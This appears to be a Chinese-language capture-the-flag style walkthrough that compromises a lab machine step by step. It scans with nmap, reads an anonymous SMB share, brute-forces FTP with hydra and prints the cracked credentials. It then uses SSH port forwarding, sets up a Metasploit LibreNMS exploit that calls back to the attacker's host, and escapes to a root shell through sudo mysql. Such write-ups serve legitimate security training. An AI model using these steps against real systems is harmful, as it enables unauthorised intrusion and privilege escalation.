一、信息收集
1、查看靶机的MAC地址:
2、扫描靶机的ip地址:
nmap 192.168.13.0/24
3、扫描靶机开放的端口:
nmap -p- -sC -sT -sV -A 192.168.13.156
4、查看靶机的80端口:
5、扫描80端口的目录:
6、发现目录和页面什么也没有,扫描端口的时候发现smb服务,使用命令列出共享文件夹:
smbclient -L 192.168.13.156
发现anonymous共享文件夹
7、使用smbclient打开发现在backups文件夹下有一个log.txt:
smbclient //192.168.13.156/anonymous
cd backups/
get log.txt
cat log.txt
在文件中发现用户aeolus
8、使用hydra工具尝试爆破用户密码:
hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.13.156
爆破成功!我们拿到了账号和密码:aeolus \ sergioteamo
9、之前扫描端口发现开放22端口,使用爆破出来的账密尝试ssh登录:
10、使用命令查看开放了哪些端口:
nmap -A -T4 -p- localhost
11、发现多了8080端口,但是访问不了,尝试端口转发:
ssh -Nf -L 9999:192.168.13.128:8080 aeolus@192.168.13.156
12、尝试访问:
13、确认是librenms,我们使用metasploit找到相关漏洞并使用:
msfconsole
search librenms
use 1
show options
14、添加参数,对漏洞进行利用:
set PASSWORD sergioteamo
set RHOSTS 127.0.0.1
set RPORT 9999
set USERNAME aeolus
set LHOST 192.168.13.128
run
二、提权
1、经过上面sudo -l发现用户存在sudo权限,使用mysql进行提权,并且查看proof.txt:
sudo -u root mysql -e '\! /bin/bash'